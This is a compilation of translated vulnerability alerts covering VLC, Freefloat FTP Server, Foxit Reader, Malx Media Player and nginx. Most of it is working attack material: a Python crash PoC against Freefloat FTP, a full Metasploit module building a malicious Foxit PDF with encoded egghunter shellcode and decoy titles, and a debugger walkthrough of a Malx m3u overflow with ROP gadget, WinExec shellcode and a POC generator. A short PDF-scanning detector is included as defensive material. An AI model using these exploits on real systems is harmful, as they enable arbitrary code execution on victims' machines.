VLC Media Player's modules/codec/subsdec.c contains an error when parsing HTML subtitles; an attacker can cause a buffer overflow with a specially crafted subtitle and thereby execute arbitrary code.
<*Source: vendor
Link: secunia.com/advisories/51692/
www.videolan.org/news.html
*>
Recommendation:
Vendor patch:
VideoLAN
--------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
www.videolan.org/
Part 14: Freefloat FTP Server multiple-command remote buffer overflow vulnerabilities alert
Release date: -08-05
Updated: 2011-08-05
Affected systems:
Freefloat Freefloat FTP Server 1.00
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49052
Freefloat FTP Server is free software for uploading files and managing wired and wireless devices.
Freefloat FTP Server has remote buffer overflow vulnerabilities in the handling of several commands; a remote attacker can exploit them to execute arbitrary code in the affected application, or possibly cause a denial of service.
<*Source: Veerendra G.G
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!
49052.py
#!/usr/bin/python
##############################################################################
# Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor : www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory : secpod.org/blog/?p=310
# secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
# secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version : Freefloat FTP Server Version 1.0
# Date : 21/07/2011
##############################################################################
import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : ", HOST
        sys.exit(0)
    res = tcp_sock.recv(1024)
    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)
    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send(CMD + " " + "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)
    HOST = sys.argv[1]
    PORT = 21
    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]
    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." % (CMD)
        print "[+] Checking Server Crashed or not..."
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" % (CMD)
            sys.exit(0)
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Freefloat
---------
The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:
www.freefloat.com/
Part 15: Foxit P DF Reader v4.1.1 Title stack buffer overflow vulnerability alert
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF
  include Msf::Exploit::Egghunter
  #include Msf::Exploit::Seh # unused due to special circumstances

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Foxit PDF Reader prior to version
        4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that
        contains an overly long string in the Title field. This results in overwriting a
        structured exception handler record.
        NOTE: This exploit does not use javascript.
      },
      'License'        => MSF_LICENSE,
      'Version'        => "$Revision: 11096 $",
      'Author'         =>
        [
          'dookie',        # Discovered the bug
          'Sud0',          # Original exploit (from Offsec Exploit Weekend)
          'corelanc0d3r',  # Metasploit exploit
          'jduck'          # Metasploit-fu
        ],
      'References'     =>
        [
          #[ 'CVE', '' ],
          [ 'OSVDB', '68648' ],
          [ 'URL', 'www.exploit-db.com/exploits/15532' ],
          [ 'URL', 'www.corelan.be:8800/index.php//11/13/offensive-security-exploit-weekend/' ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e",
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EDI', # egghunter jmp edi
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Foxit Reader v4.1.1 XP Universal', { 'Offset' => 540, 'Ret' => "\x4B\x6A" } ] #unicode p/p/r foxit reader.exe
        ],
      'DisclosureDate' => 'Nov 13 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The output filename.', 'corelan_foxit.pdf']),
        OptString.new('OUTPUTPATH', [ false, 'The location to output the file.', './data/exploits/'])
      ], self.class)
  end

  def exploit
    @label = rand_text_alpha(7)
    nseh = "\x5A\x41" # pop edx -- to make edx writable
    seh = target['Ret']
    # inc ecx / pop esp / popad / push esp / ret
    align = "\x41\x61\x5C\x5C\x41\x61\x41\x54\x41\xC3"
    ecx_control = "\xB3\x30\xB3" # becomes ecx
    hunter, @egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    # Encode with alphamixed, then unicode mixed
    [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
      enc = framework.encoders.create(name)
      if name =~ /unicode/
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
      else
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
      end
      # NOTE: we already eliminated badchars
      hunter = enc.encode(hunter, nil, nil, platform)
      if name =~ /alpha/
        #insert getpc_stub & align EDX, unicode encoder friendly.
        #Hardcoded stub is not an issue here because it gets encoded anyway
        getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
        hunter = getpc_stub + hunter
      end
    }
    #tweak hunter, patched to make it write to ECX
    hunter[1] = "a"
    doctitles = [
      "Confidential : Contract + Terms of Use",
      "Contract information",
      "Acquisition contract",
      "...loading, please wait...",
      "Trademark, patent and copyright information",
      "Limited Liability Partnership",
      "Partnership agreement",
      "Last will and testament",
      "How to hack gmail",
      "Running Metasploit on Windows Mobile",
      "Free torrent sites",
      "Lady Gaga naked",
      "Free Shopping vouchers"
    ]
    sploit = ''
    sploit << doctitles[rand(doctitles.length)]
    sploit << " " * (target['Offset'] - sploit.length)
    sploit << nseh << seh
    sploit << align
    sploit << ecx_control
    sploit << hunter
    file_create(make_pdf(sploit))
  end

  # Override the mixin obfuscator since it doesn't seem to work here.
  def nObfu(str)
    return str
  end

  def trailer(root_obj)
    ret = 'trailer'
    ret << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj)
    ret << nObfu("/Info ") << ioRef(5)
    ret << nObfu("/#{@label} #{@egg}")
    ret << nObfu(">>")
    ret << eol
    ret
  end

  def make_pdf(sploit)
    @pdf << header('1.4')
    add_object(1, nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu(">>"))
    add_object(2, nObfu("<</Type/Outlines/Count 0>>"))
    add_object(3, nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]>>"))
    add_object(4, nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>"))
    add_object(5, nObfu("<</Title (#{sploit})>>"))
    finish_pdf
  end
end
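As an added detection-side example (not part of the Metasploit module above), this Python resolves a PDF's trailer /Info reference, measures the decoded /Title against the module's 540-byte offset, and lists trailer keys outside the PDF specification, which is where the module parks its egg; the sample PDF is constructed here.

```python
import re

# Added example, not the Metasploit module above: inspect the trailer and the Info
# dictionary of a PDF for a /Title long enough to reach the SEH record the module
# overwrites (its target 'Offset' is 540) and for trailer keys the spec does not define.
TITLE_LIMIT = 540

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
INFO_RE = re.compile(rb"/Info\s+(\d+)\s+\d+\s+R")
TRAILER_RE = re.compile(rb"trailer\s*<<(.*?)>>", re.S)
# A PDF string is either a (literal with backslash escapes) or a <hex string>.
TITLE_RE = re.compile(rb"/Title\s*(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)", re.S)
ESCAPE_RE = re.compile(rb"\\(?:[0-7]{1,3}|.)", re.S)
KNOWN_TRAILER_KEYS = {b"Size", b"Prev", b"Root", b"Encrypt", b"Info", b"ID", b"XRefStm"}


def decoded_length(pdf_string: bytes) -> int:
    """Number of bytes the string decodes to, delimiters excluded."""
    body = pdf_string[1:-1]
    if pdf_string.startswith(b"<"):
        return (len(re.sub(rb"\s", b"", body)) + 1) // 2  # two hex digits per byte
    return len(ESCAPE_RE.sub(b"?", body))                   # each escape yields one byte


def trailer_oddities(data: bytes) -> list:
    """Trailer dictionary keys that the PDF specification does not define."""
    m = TRAILER_RE.search(data)
    if not m:
        return []
    keys = re.findall(rb"/([^\s/<>\[\]()]+)", m.group(1))
    return [k for k in keys if k not in KNOWN_TRAILER_KEYS]


def scan_pdf(data: bytes, limit: int = TITLE_LIMIT) -> dict:
    """Resolve the trailer's /Info reference and measure its /Title."""
    objects = {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(data)}
    report = {"info_obj": None, "title_len": 0, "odd_trailer_keys": [],
              "suspicious": False, "reason": ""}
    info = INFO_RE.search(data)
    if not info:
        report["reason"] = "no /Info reference in trailer"
        return report
    report["info_obj"] = int(info.group(1))
    body = objects.get(report["info_obj"])
    if body is None:
        report.update(suspicious=True, reason="dangling /Info reference")
        return report
    m = TITLE_RE.search(body)
    if m:
        report["title_len"] = decoded_length(m.group(1))
        if report["title_len"] >= limit:
            report.update(suspicious=True,
                          reason="/Title is %d bytes, limit %d" % (report["title_len"], limit))
    report["odd_trailer_keys"] = trailer_oddities(data)
    if report["odd_trailer_keys"]:
        report["suspicious"] = True
    return report


def sample_pdf(title: bytes, extra_trailer: bytes = b"") -> bytes:
    """Constructed minimal PDF (not a real Foxit test file) carrying the given /Title."""
    return (b"%PDF-1.4\n"
            b"1 0 obj<</Type/Catalog/Pages 3 0 R>>endobj\n"
            b"3 0 obj<</Type/Pages/Kids[]/Count 0>>endobj\n"
            b"5 0 obj<</Title (" + title + b")>>endobj\n"
            b"trailer<</Size 6/Root 1 0 R/Info 5 0 R" + extra_trailer + b">>\n%%EOF\n")


if __name__ == "__main__":
    print(scan_pdf(sample_pdf(b"Quarterly report")))        # not suspicious
    print(scan_pdf(sample_pdf(b"A" * 600)))                 # /Title reaches the SEH offset
    print(scan_pdf(sample_pdf(b"x", b"/Egg w00tXYZ")))      # unknown trailer key
```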
Part 16: Malx Media Player malformed m3u file stack overflow local arbitrary code execution vulnerability alert
Malx Media Player 3.2.2 overflows the stack when handling a malformed m3u file, which lets an attacker take control of EIP and execute arbitrary code (ROP on Win7 SP1 with MacType loaded).
Malx Media Player initialises a stack variable sized by MAX_PATH, but the vfscanf call does not bound the input length, causing a stack overflow. Software: malx-media-player.software.informer.com/
Build a malformed M3U file, load it into the program, and it crashes as expected. A kvn backtrace shows the crash came through vfscanf, so MAX_PATH must be involved; now find which function called vfscanf:
0:000> bp msvcrt!vfscanf
0:000> bl
0 e 76cf574d 0001 (0001) 0:**** msvcrt!vfscanf
1 eu 0001 (0001) (msvcrf!fscanf)
0:000> g
Breakpoint 0 hit
eax=0018f92c ebx=0018fb64 ecx=76c9a6db edx=0008e381 esi=76d22960 edi=76cf58b9
eip=76cf574d esp=0018f904 ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
msvcrt!vfscanf:
76cf574d 6a0c            push    0Ch
gu twice, and we see it was entered from image00400000+0x46f0:
0:000> gu
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=76cf58d4 esp=0018f908 ebp=0018f91c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
msvcrt!fscanf+0x1b:
76cf58d4 83c414 add esp,14h
0:000> gu
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=004046f0 esp=0018f924 ebp=00000001 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
image00400000+0x46f0:
004046f0 83c40c add esp,0Ch
Without source or symbols this is painful to read, so just roughly identify the problem area; gu once more at this point:
0:000> gu
(2304.288): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=01d5004c
eip=41414141 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
41414141 ?? ???
EIP went to 41414141, so the retn address was overwritten.
Start again and single-step (p) from image00400000+0x46f0 onward; nothing happens until the retn, so it must be this retn:
Breakpoint 0 hit
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=00404744 esp=0018f93c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
image00400000+0x4744:
00404744 81c408020000    add     esp,208h
0:000> dd esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0:000> p
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
image00400000+0x474a:
0040474a c3 ret
Look at the corresponding stack:
0:000> dd esp
0018fb44 41414141 41414141 41414141 41414141
0018fb54 41414141 41414141 41414141 41414141
0018fb64 41414141 41414141 41414141 41414141
0018fb74 41414141 41414141 41414141 41414141
0018fb84 43414141 43434343 43434343 43434343
0018fb94 43434343 43434343 43434343 43434343
0018fba4 43434343 43434343 43434343 43434343
0018fbb4 53434343 53535353 53535353 53535353
What a sad story...
Since the second-to-last instruction is add esp,208h, let us look back by that much:
0:000> dd esp-208 esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0018f9bc 00870000 00000000 01010000 0018f9ac
0018f9cc 00000068 0018fac4 77a671f5 114fc46b
0018f9dc fffffffe 77ac1794 77a7ac29 00870000
0018f9ec 50000063 77a238aa 66f6ee0f 00000000
0018f9fc 00870000 0088d110 00000000 00401270
0018fa0c 00000000 00de0706 00000084 00000000
0018fa1c 00680515 00000004 000003a8 00870000
0018fa2c 00000000 00000001 00000001 00000000
0018fa3c 00000000 415c3a41 41414141 41414141
0018fa4c 41414141 41414141 41414141 41414141
0018fa5c 41414141 41414141 41414141 41414141
0018fa6c 41414141 41414141 41414141 41414141
0018fa7c 41414141 41414141 41414141 41414141
0018fa8c 41414141 41414141 41414141 41414141
0018fa9c 41414141 41414141 41414141 41414141
0018faac 41414141 41414141 41414141 41414141
0018fabc 41414141 41414141 41414141 41414141
0018facc 41414141 41414141 41414141 41414141
0018fadc 41414141 41414141 41414141 41414141
0018faec 41414141 41414141 41414141 41414141
0018fafc 41414141 41414141 41414141 41414141
0018fb0c 41414141 41414141 41414141 41414141
0018fb1c 41414141 41414141 41414141 41414141
0018fb2c 41414141 41414141 41414141 41414141
0018fb3c 41414141 41414141 41414141
Indeed a sad story...
At what offset is the overwritten retn address?
0:000> ?(18fa3c+4 - esp)
Evaluate expression: -260 = fffffefc
260, that familiar number; a real disaster.
Looking for ROP gadgets, MacType!ReloadConfig+0x24cca has one that fits the requirement very well:
---------------------- size 1
MacType!ReloadConfig+0x24cca:
1002756a 54 push esp
1002756b c3 ret
Since this is just practice, we will not worry about portability for now; look up the address of WinExec:
0:000> x kernel32!WinExec
768a2c51 kernel32!WinExec = <no type information>
That roughly sketches the original form of our shellcode:
ROP 6a750210 #1002756a; MacType!ReloadConfig+0x24cca, push esp; ret;
#Shellcode start
$     31C0          XOR EAX,EAX
$+2   50            PUSH EAX
$+3   B8 43414C43   MOV EAX,434C4143
$+8   50            PUSH EAX           ; "CALC"
$+9   89E1          MOV ECX,ESP        ; save a pointer to this string
$+B   40            INC EAX
$+C   50            PUSH EAX           ; uCmdShow == 1
$+D   51            PUSH ECX           ; lpCmdLine
$+E   E8 XXXXXXX    CALL WinExec
Actually a MOV EBX,ESP; DEC EBX,80H; MOV EBP,EBX also has to be set up so that WinExec does not fail... and there has to be an XOR EAX,EAX before the INC EAX. The above is the draft I wrote earlier; I will be lazy and not paste the machine code, you can look it up by dropping it into OllyDbg.
Edit the M3U file, load it and run (as shown below):
*** WARNING: Unable to verify checksum for E:\Program Files (x86)\Mplay\mplay.exe
*** ERROR: Module load completed but symbols could not be loaded for E:\Program Files (x86)\Mplay\mplay.exe
0:001> bp 40474a
0:001> g
Breakpoint 0 hit
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
mplay+0x474a:
0040474a c3              ret
0:000> p
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=1002756a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
*** WARNING: Unable to verify checksum for E:\Program Files (x86)\MacType\MacType.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Program Files (x86)\MacType\MacType.dll -
MacType!ReloadConfig+0x24cca:
1002756a 54              push    esp
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=1002756b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
MacType!ReloadConfig+0x24ccb:
1002756b c3              ret
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb48 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
0018fb48 31c0            xor     eax,eax
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb4a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb4a 50              push    eax
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb4b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb4b b843414c43      mov     eax,434C4143h
0:000>
eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb50 esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb50 50              push    eax
0:000>
eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb51 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb51 89e1            mov     ecx,esp
0:000>
eax=434c4143 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb53 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb53 40              inc     eax
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb54 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb54 50              push    eax
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb55 esp=0018fb3c ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb55 51              push    ecx
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb56 esp=0018fb38 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb56 e8fb307176      call    kernel32!WinExec+0x5 (768a2c56)
0:000> dd esp
0018fb38 0018fb40 434c4144 434c4143 00000000
0018fb48 b850c031 434c4143 40e18950 fbe85150
0018fb58 00767130 00000000 00000000 555c3a45
0018fb68 73726573 616c425c 53547473 7365445c
0018fb78 706f746b 6d2e375c 75007533 008fb710
0018fb88 00000000 ffffffec 00000000 020e4758
0018fb98 020e4758 008fb710 008fb710 0018fbe4
0018fba8 754a702c 008fb710 00000000 ffffffec
0:000> da 18fb40
0018fb40 "CALC"
Note: in debug mode the MacType module is not injected, so to play with this you have to let the program run on its own and then attach.
POC:
#!/usr/bin/env python
print "blast off!"
filepath = "poc.m3u"
f = open(filepath, "wb")
file = '...'  # the raw byte string of the original post is not reproduced here: "#EXTM3U\r\n", a run of \x90, the push esp; ret address \x6a\x75\x02\x10 and the WinExec("CALC") stub drafted above
f.write(file)
f.close()
print "Done.\nOpen poc.m3u"
The finished binary file: lno.pw/exp.m3u. To save effort I did not handle it in a portable way, so adjust the WinExec address yourself.
Fix: use the _s safe input functions.
Part 17: Nginx 1.3.9, 1.4.0 buffer overflow vulnerability and 64-bit exploitation analysis vulnerability alert
CVE-2013-2028: nginx has a problem handling certain malformed HTTP request length values; an attacker exploiting this flaw may cause a stack overflow and execute arbitrary code, or at minimum a denial of service.
Affected software and systems: nginx 1.3.9-1.4.0
Solution: NSFOCUS recommends upgrading to nginx 1.4.1 or nginx 1.5.0.
A few days after CVE-2013-2028 was published, the Vnsecurity group had already achieved deep exploitation of this flaw through the overflow. But to make the exploit more reliable and effective in real penetration-testing environments, Vnsecurity kept developing different payloads. Since an exploit for 32-bit Nginx appeared in Metasploit, Vnsecurity decided to publish some of their work. In this article you will find how to quickly analyse the Nginx flaw and then use the overflow payload Vnsecurity provides to exploit the flaw effectively on 64-bit Linux.
91ri.org: Metasploit already contains an exploit for 32-bit Nginx; search for it and test it yourselves. :)
Part 18: Nginx 1.3.9, 1.4.0 buffer overflow vulnerability and 64-bit exploitation analysis vulnerability alert